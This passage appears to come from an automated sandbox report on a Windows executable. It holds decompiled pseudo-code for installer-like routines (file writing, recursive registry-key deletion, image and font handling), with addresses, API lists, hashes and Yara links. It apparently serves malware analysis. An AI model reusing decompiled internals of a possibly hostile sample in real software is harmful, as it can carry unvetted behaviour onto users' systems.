				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402BCE(0xfffffff0);
				 *(_t56 - 0x78) = _t23;
				if(E00405C52(_t50) == 0) {
					E00402BCE(0xffffffed);
				}
				E00405DC1(_t50);
				_t26 = E00405DE6(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42f458;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E0040343E(_t45);
						E00403428(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x38) = _t54;
						if(_t54 != _t45) {
							E004031B7(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x8c) =  *_t54;
								E00405DA1( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x8c);
							}
							GlobalFree( *(_t56 - 0x38));
						}
						E00405E8D( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0xc)) = E004031B7(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x78));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











                                                                                        0x004027df
                                                                                        0x004027e1
                                                                                        0x004027ed
                                                                                        0x004027f0
                                                                                        0x004027fa
                                                                                        0x004027fe
                                                                                        0x004027fe
                                                                                        0x00402804
                                                                                        0x00402811
                                                                                        0x00402819
                                                                                        0x0040281c
                                                                                        0x00402822
                                                                                        0x00402830
                                                                                        0x00402835
                                                                                        0x00402839
                                                                                        0x0040283c
                                                                                        0x00402845
                                                                                        0x00402851
                                                                                        0x00402855
                                                                                        0x00402858
                                                                                        0x00402862
                                                                                        0x00402887
                                                                                        0x00402869
                                                                                        0x0040286e
                                                                                        0x00402876
                                                                                        0x0040287c
                                                                                        0x00402881
                                                                                        0x00402881
                                                                                        0x0040288e
                                                                                        0x0040288e
                                                                                        0x0040289b
                                                                                        0x004028a1
                                                                                        0x004028b3
                                                                                        0x004028b3
                                                                                        0x004028b9
                                                                                        0x004028b9
                                                                                        0x004028c4
                                                                                        0x004028c5
                                                                                        0x004028c9
                                                                                        0x004028cd
                                                                                        0x004028d3
                                                                                        0x004028d3
                                                                                        0x004028da
                                                                                        0x004022dd
                                                                                        0x00402a5d
                                                                                        0x00402a69

                                                                                        APIs
                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                                                        • GlobalFree.KERNEL32 ref: 0040288E
                                                                                        • GlobalFree.KERNEL32 ref: 004028A1
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                        • String ID:
                                                                                        • API String ID: 2667972263-0
                                                                                        • Opcode ID: 10aa94e9192e65a0b09259698f99f40e5440345eda598c6609a5c103b0ccd052
                                                                                        • Instruction ID: 6e19ad8f311a8fe4d121ff6d49c8506e1ed5368105aa9b5939d25a16afe37da6
                                                                                        • Opcode Fuzzy Hash: 10aa94e9192e65a0b09259698f99f40e5440345eda598c6609a5c103b0ccd052
                                                                                        • Instruction Fuzzy Hash: C0219F72800124BBDF217FA5CE48D9E7E79EF09324F14823EF450762D1CA7949418FA8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 70991837, Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 97%
                                                                                        			E70991837(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v52;
				void _t45;
				void _t46;
				signed int _t47;
				signed int _t48;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				signed int _t77;
				void* _t81;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t90;
				void* _t101;

				_t85 = __edx;
				 *0x7099405c = _a8;
				_t77 = 0;
				 *0x70994060 = _a16;
				_v12 = 0;
				_v8 = E7099123B();
				_t90 = E709912FE(_t42);
				_t87 = _t85;
				_t81 = E7099123B();
				_a8 = _t81;
				_t45 =  *_t81;
				if(_t45 != 0x7e && _t45 != 0x21) {
					_a16 = E7099123B();
					_t77 = E709912FE(_t74);
					_v12 = _t85;
					GlobalFree(_a16);
					_t81 = _a8;
				}
				_t46 =  *_t81;
				_t101 = _t46 - 0x2f;
				if(_t101 > 0) {
					_t47 = _t46 - 0x3c;
					__eflags = _t47;
					if(_t47 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3c;
						if( *((char*)(_t81 + 1)) != 0x3c) {
							__eflags = _t87 - _v12;
							if(__eflags > 0) {
								L56:
								_t48 = 0;
								__eflags = 0;
								L57:
								asm("cdq");
								L58:
								_t90 = _t48;
								_t87 = _t85;
								L59:
								E70991429(_t85, _t90, _t87,  &_v52);
								E70991266( &_v52);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L49:
								__eflags = 0;
								L50:
								_t48 = 1;
								goto L57;
							}
							__eflags = _t90 - _t77;
							if(_t90 < _t77) {
								goto L49;
							}
							goto L56;
						}
						_t85 = _t87;
						_t48 = E70992EF0(_t90, _t77, _t85);
						goto L58;
					}
					_t57 = _t47 - 1;
					__eflags = _t57;
					if(_t57 == 0) {
						__eflags = _t90 - _t77;
						if(_t90 != _t77) {
							goto L56;
						}
						__eflags = _t87 - _v12;
						if(_t87 != _v12) {
							goto L56;
						}
						goto L49;
					}
					_t58 = _t57 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3e;
						if( *((char*)(_t81 + 1)) != 0x3e) {
							__eflags = _t87 - _v12;
							if(__eflags < 0) {
								goto L56;
							}
							if(__eflags > 0) {
								goto L49;
							}
							__eflags = _t90 - _t77;
							if(_t90 <= _t77) {
								goto L56;
							}
							goto L49;
						}
						__eflags =  *((char*)(_t81 + 2)) - 0x3e;
						_t85 = _t87;
						_t59 = _t90;
						_t83 = _t77;
						if( *((char*)(_t81 + 2)) != 0x3e) {
							_t48 = E70992F10(_t59, _t83, _t85);
						} else {
							_t48 = E70992F40(_t59, _t83, _t85);
						}
						goto L58;
					}
					_t60 = _t58 - 0x20;
					__eflags = _t60;
					if(_t60 == 0) {
						_t90 = _t90 ^ _t77;
						_t87 = _t87 ^ _v12;
						goto L59;
					}
					_t61 = _t60 - 0x1e;
					__eflags = _t61;
					if(_t61 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x7c;
						if( *((char*)(_t81 + 1)) != 0x7c) {
							_t90 = _t90 | _t77;
							_t87 = _t87 | _v12;
							goto L59;
						}
						__eflags = _t90 | _t87;
						if((_t90 | _t87) != 0) {
							goto L49;
						}
						__eflags = _t77 | _v12;
						if((_t77 | _v12) != 0) {
							goto L49;
						}
						goto L56;
					}
					__eflags = _t61 == 0;
					if(_t61 == 0) {
						_t90 =  !_t90;
						_t87 =  !_t87;
					}
					goto L59;
				}
				if(_t101 == 0) {
					L21:
					__eflags = _t77 | _v12;
					if((_t77 | _v12) != 0) {
						_v24 = E70992D80(_t90, _t87, _t77, _v12);
						_v20 = _t85;
						_t48 = E70992E30(_t90, _t87, _t77, _v12);
						_t81 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t48 = _t90;
						_t85 = _t87;
					}
					__eflags =  *_t81 - 0x2f;
					if( *_t81 != 0x2f) {
						goto L58;
					} else {
						_t90 = _v24;
						_t87 = _v20;
						goto L59;
					}
				}
				_t67 = _t46 - 0x21;
				if(_t67 == 0) {
					_t48 = 0;
					__eflags = _t90 | _t87;
					if((_t90 | _t87) != 0) {
						goto L57;
					}
					goto L50;
				}
				_t68 = _t67 - 4;
				if(_t68 == 0) {
					goto L21;
				}
				_t69 = _t68 - 1;
				if(_t69 == 0) {
					__eflags =  *((char*)(_t81 + 1)) - 0x26;
					if( *((char*)(_t81 + 1)) != 0x26) {
						_t90 = _t90 & _t77;
						_t87 = _t87 & _v12;
						goto L59;
					}
					__eflags = _t90 | _t87;
					if((_t90 | _t87) == 0) {
						goto L56;
					}
					__eflags = _t77 | _v12;
					if((_t77 | _v12) == 0) {
						goto L56;
					}
					goto L49;
				}
				_t70 = _t69 - 4;
				if(_t70 == 0) {
					_t48 = E70992D40(_t90, _t87, _t77, _v12);
					goto L58;
				} else {
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						_t90 = _t90 + _t77;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t71 == 0) {
							_t90 = _t90 - _t77;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L59;
				}
			}





























                                                                                        0x70991837
                                                                                        0x70991841
                                                                                        0x7099184a
                                                                                        0x7099184d
                                                                                        0x70991852
                                                                                        0x7099185b
                                                                                        0x70991864
                                                                                        0x70991866
                                                                                        0x7099186d
                                                                                        0x7099186f
                                                                                        0x70991872
                                                                                        0x70991876
                                                                                        0x70991882
                                                                                        0x7099188b
                                                                                        0x70991890
                                                                                        0x70991893
                                                                                        0x70991899
                                                                                        0x70991899
                                                                                        0x7099189c
                                                                                        0x7099189f
                                                                                        0x709918a2
                                                                                        0x70991968
                                                                                        0x70991968
                                                                                        0x7099196b
                                                                                        0x709919e5
                                                                                        0x709919e9
                                                                                        0x709919f8
                                                                                        0x709919fb
                                                                                        0x70991a03
                                                                                        0x70991a03
                                                                                        0x70991a03
                                                                                        0x70991a05
                                                                                        0x70991a05
                                                                                        0x70991a06
                                                                                        0x70991a06
                                                                                        0x70991a08
                                                                                        0x70991a0a
                                                                                        0x70991a10
                                                                                        0x70991a19
                                                                                        0x70991a2a
                                                                                        0x70991a35
                                                                                        0x70991a35
                                                                                        0x709919fd
                                                                                        0x709919e0
                                                                                        0x709919e0
                                                                                        0x709919e2
                                                                                        0x709919e2
                                                                                        0x00000000
                                                                                        0x709919e2
                                                                                        0x709919ff
                                                                                        0x70991a01
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991a01
                                                                                        0x709919ed
                                                                                        0x709919f1
                                                                                        0x00000000
                                                                                        0x709919f1
                                                                                        0x7099196d
                                                                                        0x7099196d
                                                                                        0x7099196e
                                                                                        0x709919d7
                                                                                        0x709919d9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x709919db
                                                                                        0x709919de
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x709919de
                                                                                        0x70991970
                                                                                        0x70991970
                                                                                        0x70991971
                                                                                        0x709919aa
                                                                                        0x709919ae
                                                                                        0x709919ca
                                                                                        0x709919cd
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x709919cf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x709919d1
                                                                                        0x709919d3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x709919d5
                                                                                        0x709919b0
                                                                                        0x709919b4
                                                                                        0x709919b6
                                                                                        0x709919b8
                                                                                        0x709919ba
                                                                                        0x709919c3
                                                                                        0x709919bc
                                                                                        0x709919bc
                                                                                        0x709919bc
                                                                                        0x00000000
                                                                                        0x709919ba
                                                                                        0x70991973
                                                                                        0x70991973
                                                                                        0x70991976
                                                                                        0x709919a3
                                                                                        0x709919a5
                                                                                        0x00000000
                                                                                        0x709919a5
                                                                                        0x70991978
                                                                                        0x70991978
                                                                                        0x7099197b
                                                                                        0x7099198b
                                                                                        0x7099198f
                                                                                        0x7099199c
                                                                                        0x7099199e
                                                                                        0x00000000
                                                                                        0x7099199e
                                                                                        0x70991991
                                                                                        0x70991993
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991995
                                                                                        0x70991998
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7099199a
                                                                                        0x7099197e
                                                                                        0x7099197f
                                                                                        0x70991985
                                                                                        0x70991987
                                                                                        0x70991987
                                                                                        0x00000000
                                                                                        0x7099197f
                                                                                        0x709918a8
                                                                                        0x70991920
                                                                                        0x70991922
                                                                                        0x70991925
                                                                                        0x70991943
                                                                                        0x70991946
                                                                                        0x7099194c
                                                                                        0x70991951
                                                                                        0x70991927
                                                                                        0x70991927
                                                                                        0x7099192b
                                                                                        0x7099192f
                                                                                        0x70991931
                                                                                        0x70991931
                                                                                        0x70991954
                                                                                        0x70991957
                                                                                        0x00000000
                                                                                        0x7099195d
                                                                                        0x7099195d
                                                                                        0x70991960
                                                                                        0x00000000
                                                                                        0x70991960
                                                                                        0x70991957
                                                                                        0x709918aa
                                                                                        0x709918ad
                                                                                        0x70991911
                                                                                        0x70991913
                                                                                        0x70991915
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7099191b
                                                                                        0x709918af
                                                                                        0x709918b2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x709918b4
                                                                                        0x709918b5
                                                                                        0x709918eb
                                                                                        0x709918ef
                                                                                        0x70991907
                                                                                        0x70991909
                                                                                        0x00000000
                                                                                        0x70991909
                                                                                        0x709918f1
                                                                                        0x709918f3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x709918f9
                                                                                        0x709918fc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991902
                                                                                        0x709918b7
                                                                                        0x709918ba
                                                                                        0x709918e1
                                                                                        0x00000000
                                                                                        0x709918bc
                                                                                        0x709918bc
                                                                                        0x709918bd
                                                                                        0x709918d1
                                                                                        0x709918d3
                                                                                        0x709918bf
                                                                                        0x709918c1
                                                                                        0x709918c7
                                                                                        0x709918c9
                                                                                        0x709918c9
                                                                                        0x709918c1
                                                                                        0x00000000
                                                                                        0x709918bd

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.336061251.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true
                                                                                        • Associated: 00000001.00000002.336043646.0000000070990000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.336078624.0000000070993000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.336140762.0000000070995000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: FreeGlobal
                                                                                        • String ID:
                                                                                        • API String ID: 2979337801-0
                                                                                        • Opcode ID: 8340aaf43a3d47a4a7b22e984f9b082283e570aa8323afcf3c1606915541c32f
                                                                                        • Instruction ID: 93b9c7f0c66128bc38adc14bf8d04e0148e23b5a2497cfc3c825ed7ebf85eea8
                                                                                        • Opcode Fuzzy Hash: 8340aaf43a3d47a4a7b22e984f9b082283e570aa8323afcf3c1606915541c32f
                                                                                        • Instruction Fuzzy Hash: A5512A32E36154EEDB029FB4D8446AEBBBDBBC6245F24005AE40AF3324C2356D41976F
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402CD0, Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 48%
                                                                                        			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				char _v276;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004060D3(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v276);
						_push(0);
						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v276);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406656(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                                                        0x00402cdb
                                                                                        0x00402ce4
                                                                                        0x00402ced
                                                                                        0x00402cf9
                                                                                        0x00402d02
                                                                                        0x00402d0c
                                                                                        0x00402d31
                                                                                        0x00402d37
                                                                                        0x00402d3c
                                                                                        0x00402d3d
                                                                                        0x00402d6d
                                                                                        0x00402d46
                                                                                        0x00402d48
                                                                                        0x00402d98
                                                                                        0x00402d9b
                                                                                        0x00000000
                                                                                        0x00402da1
                                                                                        0x00402d57
                                                                                        0x00402d5c
                                                                                        0x00402d5e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00402d66
                                                                                        0x00402d6b
                                                                                        0x00402d6c
                                                                                        0x00402d6c
                                                                                        0x00402d79
                                                                                        0x00402d81
                                                                                        0x00402d88
                                                                                        0x00000000
                                                                                        0x00402db1
                                                                                        0x00000000
                                                                                        0x00402d90
                                                                                        0x00402d1c
                                                                                        0x00402d2f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00402d2f
                                                                                        0x00402db7

                                                                                        APIs
                                                                                        • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: CloseEnum$DeleteValue
                                                                                        • String ID:
                                                                                        • API String ID: 1354259210-0
                                                                                        • Opcode ID: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                                                                        • Instruction ID: d75478e88f471254037528958efdeb905634950da4f4823c7bb408bf4a1a64a1
                                                                                        • Opcode Fuzzy Hash: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                                                                        • Instruction Fuzzy Hash: 44215771900108BBEF129F90CE89EEE7A7DEF44344F100476FA55B11A0E7B48E54AA68
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401D65, Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 77%
                                                                                        			E00401D65(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				CHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t58;
				long _t61;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
				} else {
					E00402BAC(2);
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				_t55 =  *(_t65 - 0x1c);
				 *(_t65 + 8) = _t30;
				_t58 = _t55 & 0x00000004;
				 *(_t65 - 0xc) = _t55 & 0x00000003;
				 *(_t65 - 0x34) = _t55 >> 0x1f;
				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
				} else {
					_t38 = E00402BCE(0x11);
				}
				 *(_t65 - 8) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x84);
				asm("sbb edi, edi");
				_t61 = LoadImageA( ~_t58 &  *0x42f440,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
					_push(_t61);
					E004061AB();
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                                                        0x00401d65
                                                                                        0x00401d69
                                                                                        0x00401d7e
                                                                                        0x00401d6b
                                                                                        0x00401d6d
                                                                                        0x00401d73
                                                                                        0x00401d73
                                                                                        0x00401d84
                                                                                        0x00401d87
                                                                                        0x00401d91
                                                                                        0x00401d94
                                                                                        0x00401d9c
                                                                                        0x00401dad
                                                                                        0x00401db0
                                                                                        0x00401dbb
                                                                                        0x00401db2
                                                                                        0x00401db4
                                                                                        0x00401db4
                                                                                        0x00401dbf
                                                                                        0x00401dcc
                                                                                        0x00401df3
                                                                                        0x00401e02
                                                                                        0x00401e10
                                                                                        0x00401e18
                                                                                        0x00401e20
                                                                                        0x00401e20
                                                                                        0x00401e29
                                                                                        0x00401e2f
                                                                                        0x004029a5
                                                                                        0x004029a5
                                                                                        0x00402a5d
                                                                                        0x00402a69

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                        • String ID:
                                                                                        • API String ID: 1849352358-0
                                                                                        • Opcode ID: 9d39b7960c4b589ca11e41561aab3825f23cbdbd0ce465e9420b3b3e566fd9b2
                                                                                        • Instruction ID: af2208a9c993d9ce4f8579721101e2d802b93c806783de9e53f89228710c5587
                                                                                        • Opcode Fuzzy Hash: 9d39b7960c4b589ca11e41561aab3825f23cbdbd0ce465e9420b3b3e566fd9b2
                                                                                        • Instruction Fuzzy Hash: EA212A72E00109AFCF15DFA4DD85AAEBBB5EB48304F24407EF901F62A1CB389951DB54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401E35, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 73%
                                                                                        			E00401E35(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402BAC(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				0x40b850->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b860 = E00402BAC(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x40b867 = 1;
				 *0x40b864 = _t15 & 0x00000001;
				 *0x40b865 = _t15 & 0x00000002;
				 *0x40b866 = _t15 & 0x00000004;
				E004062E0(_t9, _t31, _t33, 0x40b86c,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b850);
				_push(_t18);
				_push(_t33);
				E004061AB();
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                                                        0x00401e35
                                                                                        0x00401e40
                                                                                        0x00401e42
                                                                                        0x00401e4f
                                                                                        0x00401e66
                                                                                        0x00401e6b
                                                                                        0x00401e78
                                                                                        0x00401e7d
                                                                                        0x00401e81
                                                                                        0x00401e8c
                                                                                        0x00401e93
                                                                                        0x00401ea5
                                                                                        0x00401eab
                                                                                        0x00401eb0
                                                                                        0x00401eba
                                                                                        0x00402620
                                                                                        0x00401569
                                                                                        0x004029a5
                                                                                        0x00402a5d
                                                                                        0x00402a69

                                                                                        APIs
                                                                                        • GetDC.USER32(?), ref: 00401E38
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                                                        • ReleaseDC.USER32 ref: 00401E6B
                                                                                        • CreateFontIndirectA.GDI32(0040B850), ref: 00401EBA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                        • String ID:
                                                                                        • API String ID: 3808545654-0
                                                                                        • Opcode ID: d1cbb2668a8e0048c904ace968a64d6fe2784e3b1926127080350a50dd5622c8
                                                                                        • Instruction ID: bda7ea4a963eadc9936f181c2ed760bd7850ebe674c1e58b805f7706cadb7525
                                                                                        • Opcode Fuzzy Hash: d1cbb2668a8e0048c904ace968a64d6fe2784e3b1926127080350a50dd5622c8
                                                                                        • Instruction Fuzzy Hash: A3016D72504248AEE7007BB1AE4AA9A3FF8E755301F10887AF141B61F2CB7804458B6C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00404B1A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 77%
                                                                                        			E00404B1A(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
